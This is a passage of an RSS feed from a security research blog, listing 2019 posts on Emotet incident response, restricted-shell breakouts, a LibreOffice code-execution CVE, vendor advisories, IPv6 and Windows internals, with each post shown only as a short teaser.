      <pubDate>Tue, 13 Aug 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/08/black-hat-us-2019-/-some-talks/</guid>
      <description>&lt;p&gt;I’ve been at Black Hat Vegas last week and in the following I’ll shortly discuss some talks I’ve attended and which I found interesting.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;&lt;a href=&#34;https://twitter.com/gabbifish&#34;&gt;Gabriele Fisher&lt;/a&gt; &amp;amp; &lt;a href=&#34;https://twitter.com/lukevalenta&#34;&gt;Luke Valenta&lt;/a&gt;: Monsters in the Middleboxes. Building Tools for Detecting HTTPS Interception&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;This talk was about identifying if inbound HTTPS traffic reaching a server had been intercepted by a &lt;a href=&#34;https://tools.ietf.org/rfc/rfc3234.txt&#34;&gt;middlebox&lt;/a&gt; (or its software equivalent which is usually called “middleware”, a prominent example being the Lenovo Superfish piece a few years ago) on its path.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Follow-Up on the Heisec Webinar on Emotet &amp;amp; Some Active Directory Security Sources</title>
      <link>https://insinuator.net/2019/08/a-follow-up-on-the-heisec-webinar-on-emotet-amp-some-active-directory-security-sources/</link>
      <pubDate>Fri, 09 Aug 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/08/a-follow-up-on-the-heisec-webinar-on-emotet-amp-some-active-directory-security-sources/</guid>
      <description>&lt;p&gt;Some weeks ago, Heinrich and I had the pleasure to participate in the heisec-Webinar &lt;a href=&#34;https://www.heise.de/security/meldung/heisec-Webinar-Emotet-bei-Heise-Lernen-aus-unseren-Fehlern-4439874.html&#34;&gt;“Emotet bei Heise – Lernen aus unseren Fehlern”&lt;/a&gt;. We really enjoyed the webinar and the (alas, due to the format: too short) discussions and we hope we could contribute to understand how to make Active Directory implementations out there a bit safer in the future.&lt;/p&gt;&#xA;&lt;p&gt;Now, I have the pleasure to announce a continuation of our talk about Active Directory security next week, Wednesday, 14^(th) of August @heisec in the format of a technical talk &lt;a href=&#34;https://www.heise-events.de/webinare/emotet_cybercrime&#34;&gt;“Emotet bei Heise – Online-Fachgespräch zum Schutz vor Cybercrime”&lt;/a&gt;. Seats are still available 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>How to break out of restricted shells with tcpdump</title>
      <link>https://insinuator.net/2019/07/how-to-break-out-of-restricted-shells-with-tcpdump/</link>
      <pubDate>Mon, 29 Jul 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/07/how-to-break-out-of-restricted-shells-with-tcpdump/</guid>
      <description>&lt;p&gt;During security assessments we sometimes obtain access to a restricted shell on a target system. To advance further and gain complete control of the system, the next step is usually to break out of this shell. If the restricted shell provides access to certain system binaries, these binaries can often be exploited to perform such a break out. Here we would like to show an interesting example of such a break out by using the tcpdump binary.&lt;/p&gt;</description>
    </item>
    <item>
      <title>LibreOffice – A Python Interpreter (code execution vulnerability CVE-2019-9848)</title>
      <link>https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/</link>
      <pubDate>Fri, 26 Jul 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/</guid>
      <description>&lt;p&gt;While waiting for a download to complete, I stumbled across an interesting &lt;a href=&#34;https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html&#34;&gt;blogpost&lt;/a&gt;. The author describes a flaw in LibreOffice that allowed an attacker to execute code. Since this was quite recent, I was interested if my version is vulnerable to this attack and how they fixed it. Thus, I looked at the sources and luckily it was fixed. What I didn’t know before however was, that macros shipped with LibreOffice are executed without prompting the user, even on the highest macro security setting. So, if there would be a system macro from LibreOffice with a bug that allows to execute code, the user would not even get a prompt and the code would be executed right away. Therefor, I started to have a closer look at the source code and found out that exactly this is the case!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Emotet at Heise, Emotet there, Emotet everywhere – Dissection of an Incident</title>
      <link>https://insinuator.net/2019/07/emotet-at-heise-emotet-there-emotet-everywhere-dissection-of-an-incident/</link>
      <pubDate>Thu, 18 Jul 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/07/emotet-at-heise-emotet-there-emotet-everywhere-dissection-of-an-incident/</guid>
      <description>&lt;p&gt;After the &lt;a href=&#34;https://www.heise.de/ct/artikel/Emotet-bei-Heise-4437807.html&#34;&gt;Emotet Incident at Heise&lt;/a&gt;, where &lt;a href=&#34;https://www.heise.de/security/meldung/heisec-Webinar-Emotet-bei-Heise-Lernen-aus-unseren-Fehlern-4439874.html&#34;&gt;ERNW has been consulted for Incident Response&lt;/a&gt;, we decided to start a blogpost series, in which we want to regularly report on current attacks that we observe. In particular we want to provide details about the utilized pieces of malware, different stages, and techniques used for the initial infection and lateral movement. We hope that this information might help you to detect ongoing incidents, apply countermeasures, and in the best case to figure out proactive countermeasures and security controls beforehand.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 19 – Badge Hardware</title>
      <link>https://insinuator.net/2019/07/troopers-19-badge-hardware/</link>
      <pubDate>Thu, 18 Jul 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/07/troopers-19-badge-hardware/</guid>
      <description>&lt;p&gt;This post by Jeff (@jeffmakes) was delayed due to interferences with other projects but nevertheless, enjoy!&lt;/p&gt;&#xA;&lt;p&gt;This year, it was my great honour to design the hardware for the Troopers19 badge.&lt;/p&gt;&#xA;&lt;p&gt;We wanted to make a wifi-connected MicroPython-powered badge; something that would be fun to take home and hack on. It was a nice opportunity to use a microcontroller platform that I hadn’t tried before. I also used the project as a chance to finally migrate my PCB workflow from Eagle to Kicad. Inevitably it was a painful transition, which resulted in quite some delay to the project as I floundered around in the new tool, but it does mean the design files are in an open format which I hope will benefit the community of Troopers attendees and future badge designers!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Multiple Vulnerabilities in innovaphone VoIP Products Fixed</title>
      <link>https://insinuator.net/2019/07/multiple-vulnerabilities-in-innovaphone-voip-products-fixed/</link>
      <pubDate>Mon, 08 Jul 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/07/multiple-vulnerabilities-in-innovaphone-voip-products-fixed/</guid>
      <description>&lt;p&gt;Dear all,&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://www.innovaphone.com/&#34;&gt;innovaphone&lt;/a&gt; fixed several vulnerabilities in two VoIP products that we disclosed a while ago. The affected products are the &lt;a href=&#34;https://wiki.innovaphone.com/index.php?title=Reference10:Concept_Linux_Application_Platform&#34;&gt;Linux Application Platform&lt;/a&gt; and the &lt;a href=&#34;https://www.innovaphone.com/de/ip-telefonie/innovaphone-pbx.html&#34;&gt;IPVA&lt;/a&gt;. Unfortunately, the release notes are not public (yet?) and the vendor does not include information about the vulnerabilities for the Linux Application Platform. Therefore, we decided to publish some more technical details for the issues.&lt;/p&gt;&#xA;&lt;h2 id=&#34;multiple-vulnerabilities-in-linux-application-platform&#34;&gt;Multiple Vulnerabilities in Linux Application Platform&lt;/h2&gt;&#xA;&lt;p&gt;The Linux Application Platform was affected by three vulnerabilities that could be chained to get full root access to a target system. However, the initial access vector is only exploitable by authenticated users. The vulnerabilities have been identified on the Linux Application Platform V10 SR41. According to the vendor they have been fixed in &lt;a href=&#34;http://wiki.innovaphone.com/index.php?title=Support:Linux_Application_Platform_100264_%28sr57%29_available&#34;&gt;V10 SR57&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Advisories for Cisco ACI</title>
      <link>https://insinuator.net/2019/07/security-advisories-for-cisco-aci/</link>
      <pubDate>Thu, 04 Jul 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/07/security-advisories-for-cisco-aci/</guid>
      <description>&lt;p&gt;Again, Cisco released security advisories for their software-defined networking (SDN) solution called Application Centric Infrastructure (ACI). As before (see blog post &lt;a href=&#34;https://insinuator.net/2019/05/security-advisory-for-cisco-nexus-9000-series-fabric-switches-in-aci-mode/&#34;&gt;here&lt;/a&gt;), the published advisories originated from research performed in our ACI lab.&lt;/p&gt;&#xA;&lt;p&gt;The following advisories have been published:&lt;/p&gt;&#xA;&lt;p&gt;Cisco Nexus 9000 Series Fabric Switches ACI Mode Fabric Infrastructure VLAN Unauthorized Access Vulnerability&lt;br&gt;&#xA;&lt;a href=&#34;https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190703-n9kaci-bypass&#34;&gt;https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190703-n9kaci-bypass&lt;/a&gt;&lt;br&gt;&#xA;CVSS Base Score: 7.4&lt;/p&gt;&#xA;&lt;p&gt;Cisco Application Policy Infrastructure Controller REST API Privilege Escalation Vulnerability&lt;br&gt;&#xA;&lt;a href=&#34;https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190703-ccapic-restapi&#34;&gt;https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190703-ccapic-restapi&lt;/a&gt;&lt;br&gt;&#xA;CVSS Base Score: 7.2&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Surveys / Application Space</title>
      <link>https://insinuator.net/2019/06/ipv6-surveys-/-application-space/</link>
      <pubDate>Sun, 30 Jun 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/06/ipv6-surveys-/-application-space/</guid>
      <description>&lt;p&gt;In some organizations we work with a certain state of IPv6 deployment has been reached in the interim which includes, among others, the following aspects:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;the network infrastructure is IPv6-enabled (incl. interface addressing, routing [protocols] and the like).&lt;/li&gt;&#xA;&lt;li&gt;parts of supporting services (security functions, monitoring, system management) include IPv6 in a proper way.&lt;/li&gt;&#xA;&lt;li&gt;3rd party providers have been contractually obliged to deliver their services in an “IPv6-enabled” mode (as opposed to only being “IPv6-capable” which was the standard requirement in many RFIs during earlier years).&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;It might then happen that networking people (who often are the initial motivators for deploying IPv6) in such organizations are stating, when asked about IPv6: “it’s [mostly] done”.&lt;br&gt;&#xA;Point is that, alas, this does not necessarily mean that a single service or application is *actually using* IPv6, so while the above certainly constitutes an achievement it might not even be halfway through.&lt;/p&gt;</description>
    </item>
    <item>
      <title>DirectoryRanger 1.5.0 Is Available</title>
      <link>https://insinuator.net/2019/06/directoryranger-1.5.0-is-available/</link>
      <pubDate>Thu, 13 Jun 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/06/directoryranger-1.5.0-is-available/</guid>
      <description>&lt;p&gt;The next major release of DirectoryRanger is now available for customers, and for everyone who would like to try it ;-). Current attacks show that quite often the topic of Active Directory Security is not on the security agenda, but it should be, and this was the reason for us to build the tool and, of course, to maintain and improve it. So what are the major new features released with DirectoryRanger 1.5.0? Here we go:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Back from PowerShell Conference Europe…</title>
      <link>https://insinuator.net/2019/06/back-from-powershell-conference-europe/</link>
      <pubDate>Wed, 12 Jun 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/06/back-from-powershell-conference-europe/</guid>
      <description>&lt;p&gt;The &lt;a href=&#34;http://www.psconf.eu/&#34;&gt;PowerShell Conference Europe 2019&lt;/a&gt; took place last week in Hannover, and I had the pleasure to attend and speak for the second year in a row. I want to thank &lt;a href=&#34;https://twitter.com/TobiasPSP&#34;&gt;@TobiasPSP&lt;/a&gt; &lt;a href=&#34;https://twitter.com/alexandair&#34;&gt;@Alexandair&lt;/a&gt; &lt;a href=&#34;https://twitter.com/sqldbawithbeard&#34;&gt;@sqldbawithbeard&lt;/a&gt; and the &lt;a href=&#34;https://twitter.com/psconfeu&#34;&gt;@PSConfEU&lt;/a&gt; crew for putting up this &lt;a href=&#34;https://twitter.com/hashtag/PowerShell&#34;&gt;#PowerShell&lt;/a&gt; feast. From a RaspberryPi to the Clouds, from PowerShell internals to a dancing Lego robot, if you have anything to do with windows, PowerShell, or a computer, there was some content made for you…[I will update this post with links as soon as the videos are published. Make sure to check it out.]&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Properties of Windows Server 2019 / Windows 10 (1809)</title>
      <link>https://insinuator.net/2019/06/ipv6-properties-of-windows-server-2019-/-windows-10-1809/</link>
      <pubDate>Wed, 12 Jun 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/06/ipv6-properties-of-windows-server-2019-/-windows-10-1809/</guid>
      <description>&lt;p&gt;In this post I’ll cover some properties of the Windows Server 2019 IPv6 stack. It is an update of a similar post I wrote on the &lt;a href=&#34;https://insinuator.net/2017/01/ipv6-properties-of-windows-server-2016-windows-10/&#34;&gt;IPv6 properties of Server 2016&lt;/a&gt; a while ago.&lt;/p&gt;&#xA;&lt;p&gt;For this reason I will mostly look at the same properties I did at the time (read: at times without providing too much technical background information; that can be found in the other post) and I’ve hence performed the same types of practical tests.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Windows Insight: Virtual Secure Mode</title>
      <link>https://insinuator.net/2019/06/windows-insight-virtual-secure-mode/</link>
      <pubDate>Wed, 12 Jun 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/06/windows-insight-virtual-secure-mode/</guid>
      <description>&lt;p&gt;The &lt;a href=&#34;https://github.com/ernw/Windows-Insight&#34;&gt;Windows Insight&lt;/a&gt; repository currently hosts four articles on VSM (Virtual Secure Mode):&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;strong&gt;Virtual Secure Mode: Architecture Overview&lt;/strong&gt; (&lt;em&gt;Aleksandar Milenkoski&lt;/em&gt;): In this work, we discuss the architecture of a virtualized Windows environment.&lt;/li&gt;&#xA;&lt;li&gt;**Virtual Secure Mode: Communication Interfaces **(&lt;em&gt;Aleksandar Milenkoski&lt;/em&gt;): In this work, we discuss the communication interfaces that VSM implements: Isolated User Mode (IUM) system calls, normal-mode services, secure services, and hypercalls.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Virtual Secure Mode: Protections of Communication Interfaces&lt;/strong&gt; (&lt;em&gt;Aleksandar Milenkoski&lt;/em&gt;): This work discusses implemented mechanisms for securing the above VSM communication interfaces. This includes restrictions on issuing hypercalls, data marshalling and sanitization, and secure data sharing.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Virtual Secure Mode: Initialization&lt;/strong&gt; (&lt;em&gt;Dominik Phillips, Aleksandar Milenkoski&lt;/em&gt;): This work describes the process for VSM initialization activities performed by the Windows loader and the Windows kernel when Windows 10 is booted.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;– Aleksandar Milenkoski&lt;/p&gt;</description>
    </item>
    <item>
      <title>Emotet im Active Directory: Es kann jeden treffen – aber Jeder kann es dem Angreifer schwer machen!</title>
      <link>https://insinuator.net/2019/06/emotet-im-active-directory-es-kann-jeden-treffen-aber-jeder-kann-es-dem-angreifer-schwer-machen/</link>
      <pubDate>Fri, 07 Jun 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/06/emotet-im-active-directory-es-kann-jeden-treffen-aber-jeder-kann-es-dem-angreifer-schwer-machen/</guid>
      <description>&lt;p&gt;Heise berichtet aktuell öffentlich über die &lt;a href=&#34;https://www.heise.de/ct/artikel/Emotet-bei-Heise-4437807.html&#34;&gt;Emotet-Infektion im eigenen Haus&lt;/a&gt;, bei dessen Aufklärung ERNW unterstützte. &lt;a href=&#34;https://www.heise.de/newsticker/meldung/heiseshow-Emotet-trifft-Heise-Einblicke-in-einen-Trojaner-Angriff-4439850.html&#34;&gt;Damit liefert Heise Informationen&lt;/a&gt; zum Verlauf aktueller Angriffe, aber insbesondere auch wertvolle Einsichten zu Vorbeugung, Erkennung, Analyse und Gegenmaßnahmen aus eigener Erfahrung, wie sie nur selten der Öffentlichkeit preisgegeben werden.&lt;/p&gt;&#xA;&lt;p&gt;Ein Team aus Incident-Response Spezialisten der ERNW Research unterstützte Heise bei der Analyse und Rekonstruktion des Vorfalls und analysierte die Schadsoftware, um deren Ausbreitungswege nachzuvollziehen und IoCs (Indicators of Compromise) zu extrahieren. Hierdurch konnten effektive Gegenmaßnahmen entwickelt und gemeinsam mit Heise erfolgreich umgesetzt werden.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Windows Insight: The TPM</title>
      <link>https://insinuator.net/2019/05/windows-insight-the-tpm/</link>
      <pubDate>Mon, 27 May 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/05/windows-insight-the-tpm/</guid>
      <description>&lt;p&gt;The &lt;a href=&#34;https://github.com/ernw/Windows-Insight&#34;&gt;Windows Insight&lt;/a&gt; repository currently hosts three articles on the TPM (Trusted Platform Module):&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;strong&gt;The TPM: Communication Interfaces&lt;/strong&gt; (&lt;em&gt;Aleksandar Milenkoski&lt;/em&gt;): In this work, we discuss how the different components of the Windows 10 operating system deployed in user-land and in kernel-land, use the TPM. We focus on the communication interfaces between Windows 10 and the TPM. In addition, we discuss the construction of TPM usage profiles, that is, information on system entities communicating with the TPM as well as on communication patterns and frequencies;&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;The TPM: Integrity Measurement&lt;/strong&gt; (&lt;em&gt;Aleksandar Milenkoski&lt;/em&gt;): In this work, we discuss the integrity measurement mechanism of Windows 10 and the role that the TPM plays&lt;br&gt;&#xA;as part of it. This mechanism, among other things, implements the production of measurement data. This involves calculation of hashes of relevant executable files or of code sequences at every system startup. It also involves the storage of these hashes and relevant related data in log files for later analysis;&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt; &lt;/p&gt;</description>
    </item>
    <item>
      <title>The Week in Review #RIPE78</title>
      <link>https://insinuator.net/2019/05/the-week-in-review-%23ripe78/</link>
      <pubDate>Sun, 26 May 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/05/the-week-in-review-%23ripe78/</guid>
      <description>&lt;p&gt;This week &lt;a href=&#34;https://twitter.com/bcp38_&#34;&gt;Chris&lt;/a&gt; and I participated in the RIPE 78 meeting in Reykjavík. Being part of the group was fun as always and we had quite some interesting conversations with peers from (not only) the IPv6 community.&lt;br&gt;&#xA;Big thanks to the &lt;a href=&#34;https://twitter.com/RIPE_NCC&#34;&gt;RIPE NCC&lt;/a&gt; team for the smooth organization and for taking care of us!&lt;/p&gt;&#xA;&lt;p&gt;In this post I’ll provide some notes on talks I found particularly interesting, plus links to our own contributions.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Windows Insight: A New ERNW Repository</title>
      <link>https://insinuator.net/2019/05/windows-insight-a-new-ernw-repository/</link>
      <pubDate>Thu, 23 May 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/05/windows-insight-a-new-ernw-repository/</guid>
      <description>&lt;p&gt;We are glad to announce the &lt;a href=&#34;https://github.com/ernw/Windows-Insight&#34;&gt;Windows Insight&lt;/a&gt; repository. The content of this repository aims to assist efforts on analysing inner working principles, functionalities, and properties of the Microsoft Windows operating system. This repository stores relevant documentation as well as executable files needed for conducting analysis studies.&lt;/p&gt;&#xA;&lt;p&gt;Some of the content of this repository has been created in the course of a project named ‘Studie zu Systemaufbau, Protokollierung, Härtung und Sicherheitsfunktionen in Windows 10 (SiSyPHuS Win10)’ (ger.) – ‘Study of system design, logging, hardening, and security functions in Windows 10’ (eng.). This project has been contracted by the &lt;a href=&#34;https://www.bsi.bund.de/EN/TheBSI/thebsi_node.html&#34;&gt;German Federal Office for Information Security&lt;/a&gt; (ger., Bundesamt für Sicherheit in der Informationstechnik – BSI). The work planned as part of the project is conducted by ERNW GmbH, starting in May 2017.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Security for Enterprise Organisations @ #RIPE78</title>
      <link>https://insinuator.net/2019/05/ipv6-security-for-enterprise-organisations-@-%23ripe78/</link>
      <pubDate>Fri, 17 May 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/05/ipv6-security-for-enterprise-organisations-@-%23ripe78/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;https://twitter.com/bcp38_&#34;&gt;Chris&lt;/a&gt; and I will give a tutorial on the above topic at &lt;a href=&#34;https://ripe78.ripe.net/&#34;&gt;next week’s RIPE Meeting&lt;/a&gt; in Reykjavík. In this post (actually this will probably become a small series of posts) I’ll try to summarize some thoughts on IPv6 security in enterprise environments in 2019.&lt;/p&gt;&#xA;&lt;p&gt;We’re going to cover three main areas:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Why IPv6 Is Different, Security-wise&lt;/li&gt;&#xA;&lt;li&gt;Traffic Filtering in IPv6 Networks&lt;/li&gt;&#xA;&lt;li&gt;IPv6 Security in L2 Networks / First Hop Security et al.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Let’s start with the first item. In real-life scenarios the security of “a protocol” – IPv6 can rather be considered a “protocol family” which includes helper protocols like ICMPv6 and MLD (which in turn is implemented by means of ICMPv6 messages) and potentially others like DHCPv6 – might depend on a number of factors:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Heise Security Tour: Offensive PowerShell</title>
      <link>https://insinuator.net/2019/05/heise-security-tour-offensive-powershell/</link>
      <pubDate>Mon, 13 May 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/05/heise-security-tour-offensive-powershell/</guid>
      <description>&lt;p&gt;Dominik Phillips and I are taking part in a tour organized by &lt;a href=&#34;https://www.heise.de/security/&#34;&gt;Heise Security&lt;/a&gt; – the &lt;a href=&#34;https://www.heise-events.de/konferenzen/securitytour&#34;&gt;Heise Security Tour&lt;/a&gt;. We give a talk titled “PowerShell: Attack under the radar”. In this talk, we provide an overview of the architecture of PowerShell and show how attackers may use PowerShell for malicious purposes. We demonstrate PowerShell post-exploitation activities implemented as part of publicly available frameworks, such as &lt;a href=&#34;https://www.powershellempire.com/&#34;&gt;Empire&lt;/a&gt;. We also discuss a security concept for defending against such activities.&lt;/p&gt;</description>
    </item>
    <item>
      <title>#TR19 Next Generation Internet (NGI) Summaries</title>
      <link>https://insinuator.net/2019/05/%23tr19-next-generation-internet-ngi-summaries/</link>
      <pubDate>Thu, 02 May 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/05/%23tr19-next-generation-internet-ngi-summaries/</guid>
      <description>&lt;p&gt;This blogpost contains summaries of talks from this year’s &lt;a href=&#34;https://troopers.de/troopers19/&#34;&gt;TROOPERS19&lt;/a&gt; Active Directory Security Track.&lt;/p&gt;&#xA;&lt;h1 id=&#34;microsoft-it-secure-journey-to-ipv6-only&#34;&gt;Microsoft IT (Secure) Journey to IPv6-Only&lt;/h1&gt;&#xA;&lt;p&gt;Veronika McKillop, Network Architect, Cloud and Connectivity Engineering (CCE)&lt;/p&gt;&#xA;&lt;p&gt;The speaker, Veronika McKillop, working at Microsofts network infrastructure services, has given a talk about the process of switching a company network from IPv4 to IPv6-only.&lt;/p&gt;&#xA;&lt;p&gt;Within the talk the following topics were introduced: Dual Stack, Drivers for IPv6, Status of IPv6 in Networks and Security in IPv6 Networks. The talk covers the reasons why a company would like to switch from IPv4 to IPv6. Technics like NAT64 and DNS64 are introduced. The requirements to software and especially drivers to work in IPv6 environments are described. Also the problems to switch from IPv4 to IPv6-only in heterogeneous networks are addressed.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Advisory for Cisco Nexus 9000 Series Fabric Switches in ACI mode</title>
      <link>https://insinuator.net/2019/05/security-advisory-for-cisco-nexus-9000-series-fabric-switches-in-aci-mode/</link>
      <pubDate>Thu, 02 May 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/05/security-advisory-for-cisco-nexus-9000-series-fabric-switches-in-aci-mode/</guid>
      <description>&lt;p&gt;Yesterday, Cisco released a number of security advisories. Three of the advisories originated from research performed by us for the Cisco Nexus 9000 Series Fabric Switches / Cisco Application Centric Infrastructure (ACI).&lt;/p&gt;&#xA;&lt;p&gt;More specifically, these advisories are the following:&lt;/p&gt;&#xA;&lt;p&gt;Cisco Nexus 9000 Series Fabric Switches Application Centric Infrastructure Mode Default SSH Key Vulnerability&lt;br&gt;&#xA;&lt;a href=&#34;https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190501-nexus9k-sshkey&#34;&gt;https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190501-nexus9k-sshkey&lt;/a&gt;&lt;br&gt;&#xA;CVSS Base Score: 9.8&lt;/p&gt;&#xA;&lt;p&gt;Cisco Nexus 9000 Series Fabric Switches Application Centric Infrastructure Mode Root Privilege Escalation Vulnerability&lt;br&gt;&#xA;&lt;a href=&#34;https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190501-nexus9k-rpe&#34;&gt;https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190501-nexus9k-rpe&lt;/a&gt;&lt;br&gt;&#xA;CVSS Base Score: 7.8&lt;/p&gt;</description>
    </item>
    <item>
      <title>#TR19 Active Directory Security Summaries</title>
      <link>https://insinuator.net/2019/04/%23tr19-active-directory-security-summaries/</link>
      <pubDate>Tue, 30 Apr 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/04/%23tr19-active-directory-security-summaries/</guid>
      <description>&lt;p&gt;This blogpost contains summaries of talks from this year’s &lt;a href=&#34;https://troopers.de/troopers19/&#34;&gt;TROOPERS19&lt;/a&gt; Active Directory Security Track.&lt;/p&gt;&#xA;&lt;h1 id=&#34;from-workstation-to-domain-admin-why-secure-administration-isnt-secure-and-how-to-fix-it-by-sean-metcalf&#34;&gt;From Workstation to Domain Admin: Why Secure Administration Isn’t Secure and How to Fix It by Sean Metcalf&lt;/h1&gt;&#xA;&lt;p&gt;Active Directory is probably used in almost every corporation today to administer all kinds of Authorization, Authentication and Privileges. This means they are valuable targets for attackers, because once compromised they could do whatever they want. This would be the worst case scenario, right? Therefore securing AD is important and this year TROOPERS19 featured a whole track solely for AD Security.&lt;/p&gt;</description>
    </item>
    <item>
      <title>#TR19 Attack &amp; Research Summaries</title>
      <link>https://insinuator.net/2019/04/%23tr19-attack-research-summaries/</link>
      <pubDate>Mon, 29 Apr 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/04/%23tr19-attack-research-summaries/</guid>
      <description>&lt;p&gt;This blogpost contains summaries of talks from this year’s &lt;a href=&#34;https://www.troopers.de/troopers19/&#34;&gt;TROOPERS19&lt;/a&gt; Attack &amp;amp; Research Track.&lt;/p&gt;&#xA;&lt;h1 id=&#34;vxlan-security-or-injection-and-protection&#34;&gt;VXLAN Security or Injection, and protection&lt;/h1&gt;&#xA;&lt;p&gt;The talk “VXLAN Security or Injection, and protection” was held by Henrik Lund Kramshøj, who is the owner of Zencurity ApS, a small security company located in Denmark.&lt;/p&gt;&#xA;&lt;p&gt;Henrik gives an overview about lesser known VXLAN insecurities, mostly packet spoofing.&lt;/p&gt;&#xA;&lt;p&gt;In the end he gives advice how to protect against this attacks.&lt;/p&gt;</description>
    </item>
    <item>
      <title>DMEA 2019: A reunion with the Medical Informatics Community</title>
      <link>https://insinuator.net/2019/04/dmea-2019-a-reunion-with-the-medical-informatics-community/</link>
      <pubDate>Mon, 29 Apr 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/04/dmea-2019-a-reunion-with-the-medical-informatics-community/</guid>
      <description>&lt;p&gt;Earlier this month I attended the Digital Medical Expertise &amp;amp; Applications (DMEA) 2019. The DMEA fair in Berlin (formerly conhIT) is the central platform for digital health care as it brings together companies of health IT, academic institutions, politics and healthcare delivery organizations in several format such as innovation hubs and talks during congress sessions as a part of the industry fair. I participated in a congress session about IT security in healthcare with a talk about medical device security and common security flaws in medical devices. Some of the aspects have also been covered in my talk at #TR19 [1].&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers &amp;amp; Chill…</title>
      <link>https://insinuator.net/2019/04/troopers-amp-chill/</link>
      <pubDate>Fri, 26 Apr 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/04/troopers-amp-chill/</guid>
      <description>&lt;p&gt;As promised in my &lt;a href=&#34;https://insinuator.net/2019/03/the-mmm-in-community/&#34;&gt;previous post&lt;/a&gt;, I am back for an overview of the &lt;strong&gt;Troopers19 – Active Directory&lt;/strong&gt; related talks… Videos have been published and it’s popcorn time… So if you are into stories about Kingdoms and Crown Jewels, grab your loved one [or a drink…] and turn the lights down low, ’cause tonight it’s “Troopers &amp;amp; Chill…”&lt;/p&gt;&#xA;&lt;p&gt;Warning: Don’t watch it all in one go… or you will start to feel some anxiety and pain…&lt;br&gt;&#xA;and then the Flying Dutchman will move to the cloud… And at that point we are not insured anymore.&lt;/p&gt;</description>
    </item>
    <item>
      <title>MDMs – The Mobile Device “Magic” Solutions – Expectations and Reality</title>
      <link>https://insinuator.net/2019/04/mdms-the-mobile-device-magic-solutions-expectations-and-reality/</link>
      <pubDate>Mon, 15 Apr 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/04/mdms-the-mobile-device-magic-solutions-expectations-and-reality/</guid>
